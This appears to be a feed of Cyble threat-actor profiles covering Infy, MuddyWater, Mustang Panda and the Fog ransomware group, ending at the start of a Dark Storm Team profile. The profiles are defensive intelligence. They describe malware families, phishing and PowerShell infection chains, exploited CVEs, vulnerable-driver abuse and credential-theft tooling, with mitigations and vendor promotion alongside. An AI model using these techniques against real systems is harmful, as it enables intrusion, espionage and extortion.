Overview 

Infy is a state-sponsored advanced persistent threat (APT) group assessed to be of Iranian origin, with activity patterns and targeting that strongly suggest alignment with Iranian state interests. The group has been active since at least 2015, with its operations becoming publicly identifiable by 2016. Infy is also tracked under several alternative designations, including Prince of Persia, APT-C-07, and Operation Mermaid. 

Since its emergence, Infy has demonstrated a clear focus on cyber espionage, particularly against human rights activists, dissident communities, and government-related entities. While its activity levels have fluctuated, the group has shown persistence, continued tooling development, and a sustained interest in Iranian civil society targets even after periods of reduced operational tempo. 

Historical Context and Activity Timeline 

Infy’s earliest known campaigns date back to 2015, when the group began targeting Iranian human rights activists using early iterations of its custom malware.  

Activity intensified significantly in early 2016, coinciding with Iran’s February 2016 parliamentary elections. During this period, Infy conducted a concentrated set of operations aimed at surveillance, information theft, and monitoring of individuals perceived as politically sensitive or oppositional to the regime. 

Following the 2016 elections, Infy’s observable activity declined but did not cease. Telemetry data and continued detection of infrastructure and malware variants indicate that the group maintained ongoing, low-volume attack attempts against Iranian civil society and related targets.  

Geographic Origin and Targeting Scope 

Infy is assessed to operate from Iran, within the broader Middle East and Africa (MEA) region.  

However, its target is globally scope. Confirmed or reported victim countries include the following countries. 

• Azerbaijan 

• Bahrain 

• Canada 

• China 

• Denmark 

• France 

• Germany 

• India 

• Iran 

• Iraq 

• Israel 

• Italy 

• Netherlands 

• Romania 

• Russia 

• Saudi Arabia 

• Sweden 

• Syria 

• Turkey 

• The United Kingdom 

• The United States. 

The diversity of targeted countries suggests that Infy’s operations extend beyond pure domestic surveillance and include intelligence collection against foreign governments, international organizations, and diaspora communities. 

Targeted Sectors 

Infy’s operations primarily focus on: 

• Government entities 

• Law enforcement agencies (LEA) 

• Civil society organizations 

• Human rights activists and advocacy groups 

This targeting profile reinforces the assessment that Infy’s mission centers on political surveillance and intelligence collection, rather than financial crime or disruptive cyber operations. 

Malware Arsenal and Tooling Overview 

Infy’s operations rely on a limited but purpose-built malware ecosystem, consisting of two primary malware families.  

Despite the relatively small number of tools, the group has demonstrated iterative development, modular design, and increasing technical sophistication over time. 

Malware Families Used by Infy  

Infy (Reconnaissance Agent) 

The Infy malware family is primarily used for initial reconnaissance and system profiling. Early versions exhibited design flaws that allowed researchers to track infections through telemetry data, contributing to the group’s exposure. Despite these shortcomings, the malware enabled the collection of host information and served as a foundation for subsequent tooling evolution. 

Tonnerre (Backdoor and Surveillance Tool) 

Tonnerre represents Infy’s more advanced and multifunctional malware family. It is a Delphi-based backdoor composed of five distinct forms, each responsible for a specific operational capability: 

1. Installation and upgrade mechanisms, enabling persistence and malware lifecycle management. 

2. File collection modules, targeting predefined directories for data harvesting. 

3. FTP-based communication, allowing command retrieval and data exfiltration. 

4. Removable media harvesting, enabling the collection of files from external storage devices. 

5. Audio recording functionality, using the lame command-line tool to capture sound for surveillance purposes. 

Evolution of Tooling and Tradecraft 

Over time, Infy’s tooling evolved from basic document-delivered implants into multi-stage malware frameworks incorporating: 

• Custom loaders 

• Domain Generation Algorithms (DGAs) 

• Layered command-and-control (C2) architectures 

• Adaptive data exfiltration mechanisms 

This progression reflects a deliberate effort to enhance operational resilience, evade detection, and maintain persistent access to high-value targets. 

More recent activity has prominently featured the Foudre malware family, particularly its later variants. Foudre is typically delivered via malicious Microsoft Excel documents containing embedded self-extracting executables. These lures are specifically designed to bypass traditional macro-based detection mechanisms and rely on user execution rather than automatic macro triggers. 

Infection Chain and Command-and-Control Architecture 

Once executed, Foudre initiates communication with attacker-controlled infrastructure using structured HTTP GET requests. These requests transmit detailed host metadata, including: 

• Unique system identifiers 

• Usernames 

• Hostnames 

• Internal malware versioning values 

This information allows operators to inventory infected systems, assess victim relevance, and determine appropriate follow-on actions. 

Foudre’s command-and-control infrastructure is notably organized. Distinct server-side directories are used for: 

• Host validation 

• Command retrieval 

• Data exfiltration 

In multiple observed cases, directory naming conventions suggest victim segmentation, including language-specific paths. This implies that infected systems are categorized based on geographic or linguistic attributes, indicating active human operator oversight rather than indiscriminate automation. Such a structure strongly supports the assessment that Infy’s campaigns are intelligence-driven, with selective targeting and tasking. 

Secondary Payload Deployment and Persistence 

After establishing initial access via Foudre, Infy frequently deploys Tonnerre as a secondary payload to expand functionality and persistence. While Tonnerre shares architectural similarities with Foudre, it introduces its own domain generation logic and command-handling routines. 

The use of DGAs allows the malware to dynamically generate large numbers of candidate domains for command-and-control communication. This capability complicates network-based blocking, enables rapid infrastructure rotation, and reduces reliance on static indicators. The generated domains are often short-lived and distributed across multiple hosting environments, further degrading the effectiveness of signature-based defenses. 

Command-and-Control Channels 

Infy’s malware has leveraged multiple communication mechanisms over time, including web-based protocols and modern platforms such as Telegram for command-and-control. The use of widely adopted services enables the group to blend malicious traffic into normal network activity, reducing the likelihood of detection through conventional filtering. 

Exfiltration is commonly conducted over existing C2 channels, with stolen data encoded into standard command-and-control communications rather than using separate data transfer mechanisms. 

Infy’s Observed Tradecraft 

Infy’s operations rely on a combination of stealthy and adaptive techniques. The group exploits built-in system functions to execute processes and carry out tasks while also using malicious documents or executables delivered through phishing to gain access.  

They gather detailed information about systems and configurations to plan follow-on actions and exfiltrate sensitive data through established communication channels. To avoid detection, Infy blends its communications with normal web traffic and frequently changes the domains it uses to control compromised systems, making its operations difficult to block or disrupt. 

Conclusion 

Infy is a state-aligned espionage actor focused on political surveillance, using a small but precise malware toolkit, structured infrastructure, and evolving tradecraft to sustain deliberate campaigns against Iranian civil society and sensitive organizations; Cyble’s AI-powered monitoring highlights Infy as a persistent, technically advanced cyber threat, and organizations can strengthen their cyber resilience by leveraging Cyble’s real-time threat intelligence and dark web visibility.  

Book a free demo today or check out how our external threat assessment report maps out against your stack! 

Recommendation and Mitigation Strategies 

• Enhance Phishing Defenses: Implement advanced email filtering, user awareness training, and simulated phishing exercises to reduce the risk of initial malware delivery. 

• Monitor for Unusual System Behavior: Use endpoint detection tools to flag abnormal process execution, unauthorized data access, and unexpected network communications. 

• Segment Critical Systems: Isolate sensitive assets and civil society-related systems from general networks to limit lateral movement in case of compromise. 

• Track External Dependencies: Maintain visibility into third-party services, cloud platforms, and communication channels that could be exploited for command-and-control or data exfiltration. 

• Deploy Threat Intelligence: Integrate real-time monitoring of malware campaigns, emerging threat actors, and dark web activity, leveraging AI-powered platforms like Cyble for proactive detection. 

• Maintain Backup and Recovery Plans: Regularly test offline and secure backups, and document restoration sequencing to ensure business continuity in prolonged incidents. 

• Enforce Multi-Factor Authentication and Identity Controls: Protect access to critical systems and cloud accounts to prevent attackers from leveraging stolen credentials. 

MITRE ATT&CK Techniques Associated with Infy 

• Native API Execution (T1106): Infy abuses built-in operating system interfaces to execute processes, interact with low-level system services, and carry out actions while blending into normal system activity and avoiding detection. 

• Malicious File Execution (T1204.002): The group relies on social engineering to trick victims into opening malicious documents or executables, often delivered via phishing emails or placed where users are likely to interact with them. 

• System Information Discovery (T1082): Infy collects detailed information about operating systems, hardware, and configurations to assess victim environments and tailor follow-on actions. 

• Exfiltration Over Command-and-Control Channel (T1041): Stolen data is transmitted through existing command-and-control communications, allowing exfiltration to occur without establishing separate data transfer channels. 

• Web-Based Command and Control (T1071.001): The group uses common web protocols to blend malicious communications with legitimate network traffic and evade network-based detection. 

• Domain Generation Algorithms (T1568.002): Infy dynamically generates command-and-control domains to rotate infrastructure, evade blocking, and maintain resilient access to compromised systems. 

Disclaimer: This profile is based on OSINT, Cyble research, and external sources. Cyble is not responsible for the accuracy of the data or any misuse of the information presented. 

The post Threat Actor Profile: Infy   appeared first on Cyble.

Overview 

MuddyWater is an Advanced Persistent Threat (APT) group widely believed to have originated in Iran and is commonly linked to interests associated with the Islamic Revolutionary Guard Corps (IRGC). First observed several years ago, the group has maintained a consistent presence in cyber-espionage operations targeting a variety of industries and government organizations.  

Unlike typical cybercriminal operations, MuddyWater is not financially motivated. Instead, the group focuses on strategic intelligence collection, maintaining a low profile while conducting operations across multiple regions and sectors. Its campaigns are characterized by stealth, persistence, and the use of legitimate tools and operating system features, which allow it to blend into normal network activity and evade detection. 

Who is MuddyWater? 

MuddyWater is primarily an espionage-focused APT group, specializing in covert intelligence operations rather than disruptive attacks or financial gain. Its operators rely heavily on low-visibility tactics, often leveraging native system functionalities and widely available administrative tools rather than deploying custom malware. This approach minimizes the risk of detection while allowing long-term access to targeted environments. 

The group has repeatedly demonstrated technically advanced techniques for compromising third-party organizations, including spearphishing campaigns and exploiting public-facing application vulnerabilities. These operations are designed to harvest sensitive information, maintain persistence, and map critical networks over time. 

While MuddyWater is widely assessed as state-aligned, particularly with Iranian strategic objectives, some ambiguity remains regarding the level of direct state control. Analysts suggest that the group may operate through a mix of formal state resources and contracted operators, giving it flexibility in execution while maintaining plausible deniability.  

Alias Mapping for MuddyWater Group 

The following list presents aliases associated with the MuddyWater group, helping analysts and researchers track their activity and campaigns across different targets.

Origin and Geographic Scope 

MuddyWater’s activity is strongly concentrated in the Middle East, with additional operations observed across Europe, Africa, and parts of Asia and North America. The group demonstrates a regional priority aligned with Iranian geopolitical interests while maintaining the capability to operate globally. 

Confirmed or reported target countries include, United Arab Emirates, Saudi Arabia, Iraq, Israel, Jordan, Kuwait, Qatar, Bahrain, Egypt, Sudan, Tunisia, Turkey, Afghanistan, Armenia, Azerbaijan, Georgia, Tajikistan, Laos, Thailand, India, Russia, Ukraine, Belarus, Austria, Norway, Portugal, United States, Tanzania, Mali, Northern Mariana Islands, and Iran itself. 

This geographic spread indicates both regional intelligence collection and opportunistic expansion beyond immediate neighboring states. 

Targeted Sectors 

MuddyWater targets a wide range of industries, reflecting an interest in political, economic, military, and infrastructure-related intelligence. 

The diversity of sectors suggests that MuddyWater collects intelligence not only for immediate strategic value but also for long-term situational awareness across political, economic, and societal domains. 

Initial Access and Infection Chains 

MuddyWater commonly gains initial access through spearphishing campaigns, exploiting both malicious attachments and embedded links. The group has demonstrated a consistent ability to compromise third-party organizations and reuse legitimate email accounts to distribute phishing messages, increasing credibility and success rates. 

In addition to phishing, MuddyWater has exploited public-facing application vulnerabilities, including Microsoft Exchange memory corruption flaws, and has historically abused CVE-2017-0199, an Office vulnerability enabling remote code execution via malicious documents. 

Once a victim interacts with a lure document or link, the infection chain typically delivers a lightweight loader or script-based payload that establishes an initial foothold and prepares the system for follow-on activity. 

Malware Ecosystem 

MuddyWater maintains a large malware arsenal, with at least 40 identified families spanning backdoors, loaders, reconnaissance tools, and credential stealers. 

Key Malware Families 

• UDPGangster: A UDP-based backdoor delivered through macro-enabled Word documents. UDPGangster supports remote command execution, file extraction, and staged payload delivery while incorporating extensive anti-analysis checks to evade sandbox environments. 

• Fooder: A newly identified 64-bit C/C++ loader that represents a notable evolution in MuddyWater’s tooling. Fooder decrypts and reflectively loads embedded payloads, most commonly MuddyViper, entirely in memory, reducing forensic artifacts and bypassing file-based detection mechanisms. 

• MuddyViper: A previously undocumented C/C++ backdoor used as a second-stage payload. Loaded via Fooder, MuddyViper operates fully in memory and supports command execution, file upload and download, credential harvesting, and browser data collection. 

• Phoenix v4: A MuddyWater-linked backdoor delivered using a FakeUpdate loader. Phoenix v4 supports remote shell execution, file transfers, and process injection, using in-memory AES decryption for stealth and evasion. 

• Chromium_Stealer: A credential-stealing malware that targets Chromium-based browsers, harvesting stored passwords, cookies, and session data for exfiltration to command-and-control infrastructure. 

Abuse of Legitimate Tools 

MuddyWater frequently repurposes legitimate administrative and reconnaissance utilities. Tools such as ChromeCookiesView, CrackMapExec, Mimikatz, LaZagne, PowerSploit, Meterpreter, ScreenConnect, and RemoteUtilities are leveraged for credential theft, lateral movement, network mapping, and persistence. 

For example, ChromeCookiesView, originally designed as a legitimate browser utility, can be abused to extract session cookies and authentication tokens, enabling unauthorized access to victim accounts without needing plaintext credentials. CrackMapExec is used to enumerate Active Directory environments and facilitate lateral movement across enterprise networks. 

Attack Techniques Observed 

MuddyWater employs a wide range of operational methods to gain initial access to targeted environments. The group frequently takes advantage of weaknesses in internet-facing systems, allowing them to enter networks without direct user interaction.  

In many cases, they rely on carefully crafted phishing campaigns, sending emails that contain either malicious attachments or deceptive links. These messages are often designed to appear legitimate and are tailored to the intended recipient, increasing the likelihood that the content will be opened and trusted. 

Once access is established, MuddyWater uses several execution methods that blend into normal system activity. The group commonly relies on built-in management features and scheduling functions within operating systems to run their tools and maintain access over time.  

Scripting languages and command-line interfaces are heavily used, enabling the attackers to execute commands, deploy additional components, and adapt their actions dynamically without leaving obvious traces. 

MuddyWater also exploits weaknesses in client applications and encourages users to interact with malicious files or web content. By doing so, the group can trigger the execution of harmful code under the guise of legitimate activity.  

These approaches allow MuddyWater to move within networks quietly, maintain persistence, and expand access while avoiding detection mechanisms that are designed to identify more overt or noisy forms of malware. 

Conclusion 

As of late 2025, MuddyWater continues to operate as a persistent and capable espionage-focused threat actor, demonstrating a sustained emphasis on stealth, long-term access, and disciplined operational security. The group’s consistent use of covert techniques, reliance on trusted system components, and steady evolution of its tooling reinforce its role as a strategic intelligence collection actor rather than a short-lived cybercriminal entity.  

Its wide geographic reach and continued focus on government, energy, and telecommunications organizations, particularly across the Middle East, mean that affected sectors remain at elevated risk from ongoing and future campaigns. Against this backdrop, intelligence-driven visibility is critical. 

Through its threat research and AI-powered intelligence capabilities, Cyble helps organizations track actors like MuddyWater, understand new tactics, and respond proactively to cybersecurity risks. Security teams seeking deeper insight into state-aligned threats and improved preparedness can explore Cyble’s threat intelligence capabilities by scheduling a demo or requesting an external threat assessment report. 

Recommendation and Mitigation Strategies 

• Enhance Email Security: Use advanced phishing detection and regularly train employees to recognize malicious emails, especially those appearing to come from trusted sources. 

• Secure Public-Facing Systems: Promptly patch and harden internet-facing applications to reduce the risk of exploitation. 

• Control Script and Tool Usage: Restrict and monitor the use of scripting engines and built-in administrative tools commonly abused for stealthy execution. 

• Strengthen Endpoint Monitoring: Deploy behavior-based endpoint detection to identify abnormal activity and misuse of legitimate tools. 

• Limit Privileged Access: Apply least-privilege principles and strong authentication to reduce the impact of credential compromise. 

• Monitor Internal Network Activity: Watch for signs of lateral movement, credential abuse, and unauthorized system discovery. 

• Leverage Threat Intelligence: Use current threat intelligence to track evolving MuddyWater tactics and adjust defenses proactively. 

MITRE ATT&CK Techniques Associated with the MuddyWater 

• Exploit Public-Facing Application (T1190): MuddyWater has exploited vulnerabilities in internet-facing systems, including a Microsoft Exchange memory corruption flaw, to gain initial access without direct user interaction. 

• Spearphishing Attachment (T1566.001): The group has compromised third-party organizations and abused legitimate email accounts to send spearphishing messages containing targeted malicious attachments. 

• Spearphishing Link (T1566.002): MuddyWater has distributed targeted phishing emails with embedded malicious links designed to lure victims into interacting with harmful content. 

• Windows Management Instrumentation (T1047): MuddyWater has leveraged WMI through its malware to execute payloads and collect host-level information while blending into normal system activity. 

• Scheduled Task (T1053.005): The group has created scheduled tasks to maintain persistence and ensure the continued execution of its tools within compromised environments. 

• PowerShell (T1059.001): MuddyWater has extensively used PowerShell to execute commands, download payloads, and manage post-compromise activity. 

• Windows Command Shell (T1059.003): The threat actor has used custom tooling to establish reverse shells and execute commands through the Windows command-line interface. 

The post Threat Actor Profile: MuddyWater  appeared first on Cyble.

Mustang Panda, also known across security reporting as Bronze President, Camaro Dragon, CeranaKeeper, Earth Preta, HoneyMyte, PKPLUG, Red Lich, Stately Taurus, and TEMP.Hex is one of the most active and persistent China-based espionage groups operating in 2025.  

Intelligence assessments consistently associate the group with state-directed objectives, primarily focused on political, governmental, and strategic sectors. While Mustang Panda operates worldwide, long-term monitoring reveals a disproportionately heavy focus on Mongolia, alongside extensive activity targeting the Asia-Pacific, Europe, Africa, and North America. 

Overview and Strategic Objectives 

The group’s operations follow a consistent pattern centered on intelligence collection, long-term access, and exploitation of high-value organizations. Mustang Panda frequently relies on spearphishing to deliver customized malware families such as PlugX and Poison Ivy, using these tools to establish footholds inside targeted systems before expanding laterally. 

Typical operations begin with a tailored email containing either a malicious attachment or a link directing the victim to an archive hosted on platforms such as Google Drive or Dropbox. These delivery mechanisms often carry legitimate-looking executable files paired with malicious DLLs designed to load stealthy backdoors or reconnaissance modules. 

Geographic Focus and Primary Sectors of Interest 

 Mustang Panda targets a wide array of countries. Confirmed victimology includes entities in Australia, Bangladesh, Belgium, Bulgaria, China, Cyprus, Czech Republic, Germany, Ethiopia, France, the United Kingdom, Greece, Hong Kong, Hungary, Indonesia, India, Japan, South Korea, Myanmar, Mongolia, Nepal, the Philippines, Pakistan, Russia, Sweden, Singapore, Slovakia, South Sudan, Thailand, Taiwan, the United States, Vietnam, and South Africa. 

The threat actor focuses on organizations that provide geopolitical, military, or sensitive internal information. Documented targeted sectors include: 

• Aerospace and Defense 

• Education 

• Government and Law Enforcement Agencies 

• Healthcare 

• Telecommunications 

These industries align with long-term intelligence collection goals, including monitoring political developments, assessing foreign defense postures, and gathering sensitive research or communications. 

Operational Toolset 

Mustang Panda’s toolkit is extensive and diverse, combining custom malware families, open-source utilities, and widely known credential theft frameworks. Their known arsenal includes: 

• Backdoors: 9002 RAT, Bookworm, CANONSTAGER, DOPLUGS, Farseer, Hodur, RCSession, TinyNote, TONESHELL, WispRider 

• Loaders / Droppers: HopperTick, MISTCLOAK, Orat, PUBLOAD, SplatDropper, TONEINS 

• Reconnaissance Tools: AdFind, NetSess, Netview, nmap, PowerView, PVE Find AD Users, PlugX (also used for reconnaissance), THOR, Zupdax 

• Credential Theft Tools: Impacket, Mimikatz, DCSync, Hdump 

• Backdoor / Shell Utilities: TeamViewer, China Chopper 

• Other Components: nbtscan, Wevtutil, WmiExec, SnakeDisk (worm capability), STATICPLUGIN, CorKLOG, PAKLOG, HenBox (info stealer) 

In addition to their own malware, Mustang Panda frequently utilizes legitimate administrative software or security products to execute side-loading attacks. 

Access, Execution, and Persistence Techniques 

Mustang Panda commonly gains entry into target environments by sending emails that contain harmful attachments or links, often disguised within archive files or hosted on cloud services, which lure recipients into opening content that secretly installs their tools. 

Once they obtain a foothold, the group relies on a broad mix of methods to run their payloads, including scripts, scheduled tasks, document-based tricks, web content, and repurposed legitimate software that helps them blend into normal system activity.  

They also utilize various programming and automation features within operating systems to conceal their actions and ensure their tools continue running after the initial infiltration.  

To remain planted within compromised networks, Mustang Panda employs a variety of persistence mechanisms, including placing startup entries in system settings, hiding behind legitimate applications, deploying lightweight web-based access points, and utilizing techniques that enable their components to activate only under specific conditions. 

Conclusion 

As of mid-2025, Mustang Panda continues to operate as a highly capable state-aligned threat group with a global reach, consistently targeting government agencies, defense contractors, telecommunications providers, and academic institutions. Their campaigns rely on sophisticated phishing methods, custom malware, and strategic use of legitimate tools to maintain long-term access and conduct intelligence operations.  

Cyble’s threat intelligence capabilities provide visibility into persistent espionage threats, helping organizations detect, monitor, and respond to emerging risks in real-time. Book a free demo or start a free external threat assessment to uncover exposed assets, track threat actors like Mustang Panda, and strengthen your organization’s cyber resilience. 

Recommendation and Mitigation Strategies 

• Strengthen Email Security: Implement advanced email filtering and anti-phishing solutions to block malicious attachments and links. Encourage staff to verify unexpected emails and provide regular phishing awareness training to ensure a secure environment. 

• Patch and Harden Systems: Regularly update operating systems, applications, and network devices to remediate known vulnerabilities. Prioritize critical systems, including government, defense, and telecommunications platforms. 

• Restrict Script Execution: Control the execution of scripts, macros, and other automated code. Enforce policies for signed scripts, disable unnecessary scripting engines, and monitor PowerShell, VBScript, and JavaScript usage to ensure optimal security. 

• Monitor for Abnormal Activity: Deploy endpoint detection and response (EDR) and network monitoring to identify unusual behavior, such as unexpected scheduled tasks, lateral movement, or attempts to manipulate registry keys. 

• Control Administrative Privileges: Limit administrative rights and implement role-based access control to reduce the risk of credential misuse. Enforce multi-factor authentication (MFA) for all remote and privileged accounts. 

• Protect Web and Cloud Assets: Scan for exposed web shells, misconfigured cloud storage, and publicly accessible sensitive files. Ensure proper access controls and monitor for unusual access patterns. 

• Backup and Recovery: Maintain offline, encrypted backups of critical systems and data. Test restoration procedures regularly to minimize disruptions in the event of a compromise. 

• Threat Intelligence Integration: Leverage real-time threat intelligence, such as from Cyble, to track Mustang Panda activity, identify new TTPs (tactics, techniques, and procedures), and proactively defend against targeted campaigns. 

• Incident Response Preparedness: Develop and regularly update incident response plans, including specific protocols for espionage-focused intrusions and persistence-based malware, ensuring rapid containment and remediation. 

MITRE ATT&CK Techniques Associated with the Mustang Panda 

• Spearphishing Attachment (T1566.001): Mustang Panda uses spearphishing emails containing RAR or ZIP archives that bundle legitimate executables with malicious DLLs. These attachments were central to the RedDelta Modified PlugX Infection Chain for gaining initial access. 

• Spearphishing Link (T1566.002): The group sends phishing emails with embedded links that direct victims to malicious archives hosted on platforms like Google Drive or Dropbox. In RedDelta operations, these links led to HTML pages that fingerprinted the victim’s system and delivered malicious MSC files. 

• Windows Management Instrumentation (T1047): Mustang Panda executes malicious PowerShell scripts through WMI to run payloads and support follow‑on activity. 

• Scheduled Task (T1053.005): The group creates scheduled tasks to launch malware, maintain persistence, and establish reverse shells for long‑term access. 

• Command and Scripting Interpreter (T1059): Mustang Panda has used various scripting interpreters, including the deployment of Meterpreter shellcode for execution. 

• PowerShell (T1059.001): The group uses malicious PowerShell scripts and relies on LNK files to trigger PowerShell commands that install payloads such as PlugX, as observed in RedDelta activity. 

• Windows Command Shell (T1059.003): Mustang Panda executes HTA files, batch scripts, and command-line instructions, including commands designed to delay execution before launching malware. 

• Visual Basic (T1059.005): The group embeds VBScript in LNK files to enable downloads and collection, uses malicious VBA macros in documents, and employs VBS-based persistence via “autorun.vbs” placed in startup folders. 

• JavaScript (T1059.007): Mustang Panda executes JavaScript payloads using wscript.exe to run malicious scripts on target systems. 

• Software Deployment Tools (T1072): Legitimate enterprise tools, including antivirus and security agents, are abused to run scripts and side‑load malicious DLLs. 

• Native API (T1106): The group makes extensive use of Windows API calls for execution and evasion. 

• Shared Modules (T1129): DLLs are loaded using functions like LoadLibrary to support execution chains. 

• Exploitation for Client Execution (T1203): Mustang Panda exploits vulnerabilities such as CVE‑2017‑0199 and uses techniques like GrimResource to weaponize MSC files for arbitrary code execution. 

• Malicious Link (T1204.001): The group sends links to malicious webpages that deploy JavaScript-based droppers. In some cases, these links trigger MSC files that execute PowerShell commands to retrieve remote MSI installers. 

• Malicious File (T1204.002): User‑executed malicious files, including LNK objects and executables showing tailored decoy documents, are used to deliver malware during campaigns like those linked to RedDelta. 

• Traffic Signaling (T1205): Mustang Panda uses “magic packet” values in command‑and‑control communication, activating in-memory components only when specific packet patterns are detected. 

The post Threat Actor Profile: Mustang Panda appeared first on Cyble.

The Fog ransomware group is one of the fastest-growing cybercrime actors, gaining attention for its multi-stage infection chain, broad targeting range, and reliance on affiliates.  

Last observed in March 2025, the group left behind a complex operational footprint that indicates both technical maturity and organized collaboration across multiple campaigns.  

Although their public-facing activity has ceased, the group’s tactics and toolsets continue to inform investigations into affiliated ransomware operators and potential successor entities. 

Initial Access and Multi-Stage Delivery Chain 

Fog campaigns relied heavily on phishing as the primary means of entry. The group distributed emails containing an archive titled “Pay Adjustment.zip”, which included an LNK shortcut disguised to resemble a PDF document. When executed, this shortcut initiated a download sequence that retrieved stage1.ps1, a PowerShell script responsible for triggering the remaining infection stages. 

This script functioned as the centerpiece of the operation. It downloaded additional payloads, including a ransomware loader named cwiper.exe and a privilege-escalation utility known as ktool.exe, and fetched secondary scripts used for reconnaissance and data exfiltration. The same PowerShell command embedded in the script also appeared within the deobfuscated ransom-note text, suggesting that the group relied on multiple vectors that all funneled back to the same staging mechanism. 

Beyond its technical role, stage1.ps1, the primary bootstrapper, contains nonstandard content for ransomware operations: political commentary and commands to open political YouTube videos. This mix of functionality and messaging made Fog campaigns unusual compared to more commercially driven ransomware groups. 

Payload Structure and Anti-Analysis Behavior 

Fog’s payload ecosystem comprises several distinct components. Scripts such as Lootsubmit.ps1 and Trackerjacker.ps1 gathered system metadata, network details, and geolocation information, sometimes through external services like the Wigle API, before sending the results to a remote receiver. The ransom workflow was linked to a Monero payment address, often embedded in a QR code dropped on infected machines. 

Privilege escalation attempts were facilitated through ktool.exe, which deployed a vulnerable Intel driver (iQVW64.sys) to exploit a known flaw. Meanwhile, the ransomware loader embedded an encrypted Fog binary, decrypting it at runtime using a key unique to each variant. To complicate analysis, the loader performed several environmental checks, CPU count, memory size, MAC prefixes, registry markers, and timing anomalies, and halted execution if sandbox indicators were detected. 

During encryption, the malware generated dbgLog.sys, a log file, to record activity and deposited a ransom note named readme.txt. Some variants included intentionally provocative or sarcastic language, referencing fictional agencies such as the “Department of Government Efficiency.” 

Affiliate Tools and Open Directory Exposure

The Fog ransomware holds a mature Ransomware-as-a-Service ecosystem. According to Cyble Vision’s data, among the items stored are: 

• Sliver C2 frameworks 

• SonicWall VPN credential scanners 

• Credential dumps associated with stolen VPN access 

• DonPAPI and Impacket tools for DPAPI theft and lateral movement 

• Active Directory exploitation tools, including Certipy and Zer0dump 

• Kerberos/PAC attack scripts associated with noPac and Pachine 

• AnyDesk installers and automation scripts 

• Utility tools such as Powercat and Proxychains 

This extensive toolkit allows the Fog ransomware group to run full-scale intrusion operations, including reconnaissance, credential harvesting, persistence, and stealthy pivoting. 

Exploited Vulnerabilities and Campaign Expansion 

Fog operators exploited several notable vulnerabilities during their campaigns. These included: 

• CVE-2024-40766, an access-control flaw affecting SonicWall SSL-VPN appliances 

• CVE-2020-1472 (Zerologon) for domain-level compromise 

• CVE-2021-42278 and CVE-2021-42287, used for Kerberos abuse 

• CVE-2015-2291, leveraged through the vulnerable Intel Ethernet diagnostics driver 

Additionally, between January and March 2025, Fog-associated actors targeted GitLab environments, exfiltrating source code, and releasing it incrementally to pressure victims. Shortly after these incidents, the group’s dedicated leak site went offline.  

Global Footprint and Affected Sectors 

Fog ransomware activity extended across a wide geographic range, affecting organizations in regions including Europe, Asia, Africa, and the Americas. Impacted countries include Austria, Australia, Belgium, Brazil, Canada, Germany, Egypt, Israel, India, Mexico, the Philippines, Turkey, the United States, Vietnam, and many others. 

The targeting scope was equally broad. Documented victims span more than two dozen sectors, among them: 

• Aerospace and defense 

• Education 

• Government and law enforcement 

• Financial services 

• Healthcare 

• Manufacturing 

• Media and entertainment 

• Technology and telecommunications 

• Retail 

• Transportation and logistics 

• Energy and utilities 

• Pharmaceuticals and biotechnology 

Victim Activity and Double-Extortion Operations 

Fog operated under a double-extortion model, both encrypting data and stealing sensitive information to pressure victims with the threat of leaking publication. The group claimed more than 100 affected organizations. 

One confirmed case involved Waverley Christian College in Australia, which reported a cyber incident in December 2024 after the group claimed theft of several gigabytes of data. Early Fog campaigns concentrated on U.S. schools and recreation centers in mid-2024, but later activity expanded to include financial and commercial entities. 

Conclusion 

Although the Fog ransomware group has shown no confirmed activity since March 2025, its earlier campaigns highlight a technically capable operation that leveraged phishing-based delivery chains, staged PowerShell scripts, privilege-escalation exploits, and a broad affiliate toolkit.  

Whether the group has dissolved or rebranded is still unclear, but its tactics continue to inform current investigations into new ransomware actors. For organizations monitoring similar threats, Cyble’s intelligence resources can support ongoing detection and analysis to strengthen visibility into ransomware activity. Start by requesting an external threat assessment report or scheduling a personalized demo today! 

Recommendation and Mitigation Strategies 

• Implement strict email security controls to block phishing attachments, especially LNK files disguised as documents, and deploy sandbox inspection for ZIP archives. 

• Harden PowerShell usage by enforcing constrained language mode, script signing policies, and monitoring for suspicious execution patterns tied to multi-stage loaders. 

• Patch exposed systems promptly, prioritizing vulnerabilities abused by Fog operators such as SonicWall SSL-VPN (CVE-2024-40766), Zerologon (CVE-2020-1472), and Active Directory privilege-escalation flaws (CVE-2021-42278/42287). 

• Restrict the use of vulnerable or unsigned drivers and enable kernel-mode driver blocking to mitigate bring-your-own-vulnerable-driver (BYOVD) attacks like those using iQVW64.sys. 

• Enforce MFA and monitor VPN access logs to detect misuse of stolen credentials and block anomalous authentication attempts. 

• Deploy endpoint detection and response (EDR) with behavioral rules that can detect staged PowerShell chains, credential harvesting tools, and lateral movement frameworks. 

• Segment networks and limit administrative privileges to reduce the impact of credential compromise and obstruct lateral movement via tools like Impacket, DonPAPI, and Kerberos/PAC exploitation kits. 

MITRE ATT&CK Techniques Associated with the Fog Ransomware Group 

• Valid Accounts (T1078): Fog operators used stolen or compromised SonicWall VPN credentials, identified in sonic_scan.zip, to authenticate into target environments and gain initial access. 

• Exploit Public-Facing Application (T1190): Affiliates exploited vulnerabilities in exposed services, most notably the SonicWall SSL-VPN flaw CVE-2024-40766, or reused compromised VPN credentials to breach networks through internet-facing applications. 

• Spearphishing Attachment (T1566.001): Campaigns delivered phishing emails containing the archive “Pay Adjustment.zip”, which held an LNK file masquerading as a PDF; opening it initiated Fog’s multi-stage PowerShell infection chain. 

• PowerShell (T1059.001): The stage1.ps1 script served as the primary bootstrapper, downloading the ransomware loader (cwiper.exe), privilege-escalation tool (ktool.exe), and various secondary scripts used in later stages. 

• Malicious File (T1204.002): The LNK file disguised as a PDF relied on user execution to trigger a command that downloaded stage1.ps1, enabling the broader multi-stage deployment process. 

• Valid Accounts – Persistence (T1078): Fog operators maintain long–term access by repeatedly leveraging stolen SonicWall VPN credentials to reenter compromised networks. 

• Windows Service (T1543.003): Persistence was reinforced through automated installation and configuration of AnyDesk, using a PowerShell script (any.ps1) that deployed the service and set up a default access password. 

The post Threat Actor Profile: Fog Ransomware Group appeared first on Cyble.

The Dark Storm Team is one of the more active hacktivist groups known for conducting politically aligned cyber operations. Known primarily for Distributed Denial-of-Service (DDoS) campaigns, the group’s activity centers on disrupting critical transportation assets, especially airports, while simultaneously marketing DDoS-as-a-Service (DaaS) capabilities to broader audiences.

Dark Storm Team operates under various aliases, including DarkStorm, DarkStormTeam, and MRHELL112, and maintains strong affiliations within the pro-Russian hacktivist ecosystem. Its most notable partnership is with Matryoshka 424, a coalition of aligned threat groups working collectively to advance Russian geopolitical narratives.

Targeting Patterns and Operational Scope 

